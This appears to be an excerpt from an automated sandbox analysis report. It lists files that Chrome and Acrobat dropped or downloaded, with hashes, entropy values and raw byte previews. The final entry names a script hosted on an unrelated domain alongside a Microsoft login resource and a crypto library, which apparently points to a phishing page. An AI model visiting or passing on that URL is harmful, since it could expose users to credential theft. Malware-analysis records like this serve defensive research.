                                                  Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                  File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                  Category:dropped
                                                  Size (bytes):386528
                                                  Entropy (8bit):7.9736851559892425
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                  SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                  SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                  SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jan 10 18:48:36 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                  Category:dropped
                                                  Size (bytes):2673
                                                  Entropy (8bit):3.9901040003209065
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:929073D727490E0019B96385AE53EEB3
                                                  SHA1:147A6316DB77CC76AC0A34359889591C752CB9F0
                                                  SHA-256:749F295D6CA2270AD68C75A3AD743AA0B276E91E541325E96A8A087AAB0FA505
                                                  SHA-512:3E8C8FB8833B7820DE649034F8C1DE0B7D93B6482182ED68B65CB7AA8DF9DF472A44CE68EBB592E175464995D01BFF2801B8E6FB89D329FF3D44C6DCA3D54829
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:L..................F.@.. ...$+.,......x..c..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I*Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V*Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V*Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V*Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V*Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............k.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jan 10 18:48:36 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                  Category:dropped
                                                  Size (bytes):2675
                                                  Entropy (8bit):4.005550650913918
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:FE0A7F0AF8DFFC007C16EB36CB4505CA
                                                  SHA1:EA927B7FF1F1C8A21FC3B6B04EFA5A4819B2C5F2
                                                  SHA-256:A65372C8E94F4D680B8A3ECF531639BF42FF7BDEC64EB4E9B630141AD01BBA89
                                                  SHA-512:A64078B45007C2D63F078343A419D7DEFE4787990298494D4F50DD62A12736CEFB8D29CCC078333398533EDFAA776355E71ABFF49356C6D3FF8CDF4D1051E4BF
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:L..................F.@.. ...$+.,......l..c..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I*Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V*Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V*Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V*Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V*Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............k.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                  Category:dropped
                                                  Size (bytes):2689
                                                  Entropy (8bit):4.014458250076064
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:1B3CA9AABAC53D66061D1E9480B3B5E4
                                                  SHA1:18AFC318DF8F5258667C388DB6D4818DC5864DFA
                                                  SHA-256:798FCD50227D36216179CA2B827203890E0F7D8B7433E8AACE05D9AA6D16C4EF
                                                  SHA-512:56C16DB15FDA2AA4DCFCC7383188127AB5B650252F4CBF9ECB421FB4B2B3FB2D295E489D5552FE43AE7CAEB7C9CD7269AF7F244373BDE0E823D470B1A4FA1A2B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I*Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V*Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V*Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V*Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............k.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jan 10 18:48:36 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                  Category:dropped
                                                  Size (bytes):2677
                                                  Entropy (8bit):4.004007530225352
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:58FF1A447176DA30A8BEBA614818DD6E
                                                  SHA1:C37B6A4FBB241595BC3CF1FCF35000BC22844A54
                                                  SHA-256:F2613FE12CEAF33F12E88F5ED89E09F80A123B80FC4A96375C7003FE2F873B63
                                                  SHA-512:62A28562F1AB772B9B851A82610A00F1015DBCBB24A7E2195EE98E39129F7022D504E7FFE3D3533D32CEB9985CFF0FE37D57A331FDA7ECE04EE1AE8E16309623
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:L..................F.@.. ...$+.,......e..c..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I*Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V*Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V*Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V*Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V*Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............k.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jan 10 18:48:36 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                  Category:dropped
                                                  Size (bytes):2677
                                                  Entropy (8bit):3.991398603127103
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:7CCF2B60997AD5C495149BD30E1C2651
                                                  SHA1:8FD84151E9DA43B89CA082394A064E07565EB6B0
                                                  SHA-256:3A67967F29E8ABD0C6BF518040AE537DEB2EDB3E6D89A241967C6ED419685D70
                                                  SHA-512:0C57A0C079EF3FB144126D92E2E064087F1874B33FC29557475B461D610FCBB0A3E86FC59A681F7F529CD95355C0767A93EE754006228554AE5D3A935A2DEE16
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:L..................F.@.. ...$+.,......r..c..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I*Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V*Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V*Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V*Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V*Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............k.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jan 10 18:48:36 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                  Category:dropped
                                                  Size (bytes):2679
                                                  Entropy (8bit):4.00109305432625
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:46F4AD4F9B1DEA0501C5C2747537D1A7
                                                  SHA1:A89479B81C35912770BCACCEADAEA0475510334E
                                                  SHA-256:3731AB1FACDD55CB57E457B761668181E0E901F80187FA467F84064090D6CC34
                                                  SHA-512:AF800D285EA22DD763DA0F3B41BFE6524975E495AB9E3B40B2F3CB50DBA328854929AF2CDF38D3EBA9959F6D182432DDB3A39DCEEA51B3B3C6343A7F63F1CFC5
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:L..................F.@.. ...$+.,......\..c..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I*Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V*Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V*Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V*Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V*Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............k.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (48316), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):48316
                                                  Entropy (8bit):5.6346993394709
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:2CA03AD87885AB983541092B87ADB299
                                                  SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                  SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                  SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:HTML document, ASCII text, with very long lines (3450), with CRLF line terminators
                                                  Category:downloaded
                                                  Size (bytes):3452
                                                  Entropy (8bit):5.117912766689607
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:CB06E9A552B197D5C0EA600B431A3407
                                                  SHA1:04E167433F2F1038C78F387F8A166BB6542C2008
                                                  SHA-256:1F4EDBD2416E15BD82E61BA1A8E5558D44C4E914536B1B07712181BF57934021
                                                  SHA-512:1B4A3919E442EE4D2F30AE29B1C70DF7274E5428BCB6B3EDD84DCB92D60A0D6BDD9FA6D9DDE8EAB341FF4C12DE00A50858BF1FC5B6135B71E9E177F5A9ED34B9
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://login.live.com/Me.htm?v=3
                                                  Preview:<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s*(\w+)\s*=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p||s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 190152
                                                  Category:dropped
                                                  Size (bytes):61052
                                                  Entropy (8bit):7.996159932827634
                                                  Encrypted:true
                                                  SSDEEP:
                                                  MD5:C1E82BF71ADD622AD0F3BF8572F634FC
                                                  SHA1:6CA863D4CAB96669202548D301693B3F5F80B0D5
                                                  SHA-256:BA48AF15D297DB450DC4870242482145ADDB2D18375A4871C490429E2DC5464A
                                                  SHA-512:820A7F8A0C8EA33A8FE1E90CDC35F45DC1E143E836B0D8EA047E1E312F8CAEC72CDEE4E7DB54760A4D749CD0ACFE103A27E39A9A56EB2D704E448A67B0D0C079
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:...........iw.F.0.....'W...4)/qH#..D.L.EK...................().}.{..@.z........Qz.,..Ox.....i4..S.&.p......9..W....);a.].a....Y......Y<,.n..."`Is....5....P..|.-..x1.F...@...yRlG.O..5.Q.|.gy.c.^....r.EC.....xd.oL..$./..|3.......r^.j.}...M... )x.D.....%.....B..t....vZ....2L......px.G.1.*.lZYh...$.....,.../.a..;Q...._..#.....e.T.:trA_.0.:.f...........(I.x?.S...<7...o..0.`r.x.+.2..o+...4/..vzY7.C'.....!.r..4n....]P.+a..........._.8,..G>...{.4B....o.9.....r......X3..U.....'.0.@...lrX....r.W\e...].}....(.l......=........3....S..........^=D..[.zw6..e...<WQ.w.(.X..S....>.^.....^B..O-.(..U.R;h..v.......4.Dc .?..z....r.._.Y......M.a.?,...?..U.....OF.w\h$.Q..5....Q.Oj ....5U..8..Y......gYZM....y..OrY.z]B..y..;o.....oT.r...H..{K...Y&Q.......*..W....N4.......].0m..m........E.bc..~..e.. .nzS.i3^......).,Y}.=1H...... V...g.)....X..G...C....@o,.i.~...as...ehEH....u9l.2...y\J.?.(.I.q%..F#..D../>pr$...,...m.6..:,<s..~S.fl;k.'<..}z.Y.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                  Category:dropped
                                                  Size (bytes):1435
                                                  Entropy (8bit):7.8613342322590265
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:9F368BC4580FED907775F31C6B26D6CF
                                                  SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                  SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                  SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (54926)
                                                  Category:downloaded
                                                  Size (bytes):55111
                                                  Entropy (8bit):4.7118090605418175
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:E4C542A7F6BF6F74FDD8CDF6E8096396
                                                  SHA1:3A0571A695A35F238026B9398386DC99D9A0C56D
                                                  SHA-256:EEB17A45A48ACA1D7ADBCF04DE155DCD0B47CB36AD036310446BB471FEA9AAA3
                                                  SHA-512:80C8D07836842C9D2BC8223E16D22DBAC53D3240227C265C1AAEFCF45AF3922338F43F256C38686946885F8012535F3BC287CC3658012787246EB5CCF6C13A3E
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://use.fontawesome.com/releases/v5.8.1/css/all.css
                                                  Preview:/*!. * Font Awesome Free 5.8.1 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). */..fa,.fab,.fal,.far,.fas{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:inline-block;font-style:normal;font-variant:normal;text-rendering:auto;line-height:1}.fa-lg{font-size:1.33333em;line-height:.75em;vertical-align:-.0667em}.fa-xs{font-size:.75em}.fa-sm{font-size:.875em}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-fw{text-align:center;width:1.25em}.fa-ul{list-style-type:none;margin-left:2.5em;padding-left:0}.fa-ul>li{position:relative}.fa-li{left:-2em;position:absolute;text-align:center;width:2em;line-height:inherit}.fa-border{border:.08em solid #eee;border-radius:.1em;padding:.2em .25em .15em}.fa-pull-lef
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:PNG image data, 51 x 46, 8-bit/color RGB, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):61
                                                  Entropy (8bit):4.022997040570905
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:F90A5DB2882E3D59C83337CBC2CBA50C
                                                  SHA1:88CFD227F815AAB72E1242B5993F6B525D59DEA5
                                                  SHA-256:67BF66A76AF0B3007587AB61D1D35ADD177CC55BCAEBB3B1DAB2EE7F85CC8198
                                                  SHA-512:6A25843986DE52BA8CCDBDD431660A981FC47AA95ED091EFB663B73FA821C8310D9265C7479B6633B1FA2EF08D9E702F7A2F3EC99738CAA72A28C8C5D5737F25
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.PNG........IHDR...3............8....IDAT.....$.....IEND.B`.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):72
                                                  Entropy (8bit):4.241202481433726
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:9E576E34B18E986347909C29AE6A82C6
                                                  SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                  SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                  SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:gzip compressed data, from Unix, original size modulo 2^32 13665
                                                  Category:downloaded
                                                  Size (bytes):4218
                                                  Entropy (8bit):7.939840520424332
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:9CA6CCF7728CE19DD4B5DD6A42275046
                                                  SHA1:8F322D835B114CFDE61AA393DF9DD1B2C60A872A
                                                  SHA-256:392EE46B97384A11651369832E1D34C6AFA5C31C390D2E56968E790AE7E66C7F
                                                  SHA-512:6B8BBDE1375243C55411DDEE422428F24D19F6A1035CD329AE86FD561D5188FC1379631B992651264A450B5B637D8DF831EC850CF96B566CA6C2D9B1AC5586F2
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://gfsouto.com.br/cgi-documents/disk/longbow.slidercaptcha.js
